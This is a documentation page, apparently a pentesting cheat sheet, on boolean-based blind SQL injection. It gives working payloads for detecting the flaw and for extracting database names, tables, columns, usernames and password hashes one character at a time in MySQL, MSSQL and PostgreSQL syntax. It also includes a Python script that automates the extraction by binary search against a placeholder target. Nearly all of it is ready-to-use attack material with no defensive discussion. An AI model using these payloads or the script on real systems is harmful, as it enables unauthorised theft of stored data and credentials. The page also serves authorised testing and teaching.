Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

No output or errors visible. Application responds differently (content, status code, redirect) for true vs false conditions. Extract data character by character.

Detect

' AND 1=1-- -          → Normal response (TRUE)
' AND 1=2-- -          → Different response (FALSE)
If responses differ → boolean blind injectable.

Extract Data — SUBSTRING

Database Name Length

' AND LENGTH(database())=1-- -
' AND LENGTH(database())=2-- -
...
' AND LENGTH(database())=5-- -     → TRUE (length is 5)

Database Name Character by Character

' AND SUBSTRING(database(),1,1)='a'-- -
' AND SUBSTRING(database(),1,1)='b'-- -
...
' AND SUBSTRING(database(),1,1)='t'-- -    → TRUE (first char is 't')
' AND SUBSTRING(database(),2,1)='e'-- -    → TRUE (second char is 'e')

' AND ASCII(SUBSTRING(database(),1,1))>96-- -     → TRUE (> 'a')
' AND ASCII(SUBSTRING(database(),1,1))>112-- -    → TRUE (> 'p')
' AND ASCII(SUBSTRING(database(),1,1))>120-- -    → FALSE
' AND ASCII(SUBSTRING(database(),1,1))>116-- -    → TRUE
' AND ASCII(SUBSTRING(database(),1,1))=116-- -    → TRUE (char = 't')
Binary search = ~7 requests per character instead of ~36.

Extract Tables

Count Tables

' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=5-- -

Table Name

' AND SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)='u'-- -

Extract Columns

' AND SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1,1)='i'-- -

Extract Data

' AND SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1)='a'-- -
' AND SUBSTRING((SELECT password FROM users LIMIT 0,1),1,1)='$'-- -

MSSQL Syntax

' AND SUBSTRING((SELECT DB_NAME()),1,1)='m'-- -
' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>100-- -

PostgreSQL Syntax

' AND SUBSTRING((SELECT current_database()),1,1)='p'-- -
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1),1,1))>100-- -

Automation Script (Python)

import requests

url = "http://TARGET/page"
result = ""

for pos in range(1, 50):
    low, high = 32, 126
    while low <= high:
        mid = (low + high) // 2
        payload = f"' AND ASCII(SUBSTRING(database(),{pos},1))>{mid}-- -"
        r = requests.get(url, params={"id": payload})
        if "expected_true_content" in r.text:
            low = mid + 1
        else:
            high = mid - 1
    if low > 126:
        break
    result += chr(low)
    print(f"[+] {result}")

print(f"Result: {result}")

Quick Reference

StepPayload
Detect' AND 1=1-- - vs ' AND 1=2-- -
Length' AND LENGTH(database())=N-- -
Char by char' AND SUBSTRING(database(),POS,1)='x'-- -
Binary search' AND ASCII(SUBSTRING(database(),POS,1))>N-- -

Sources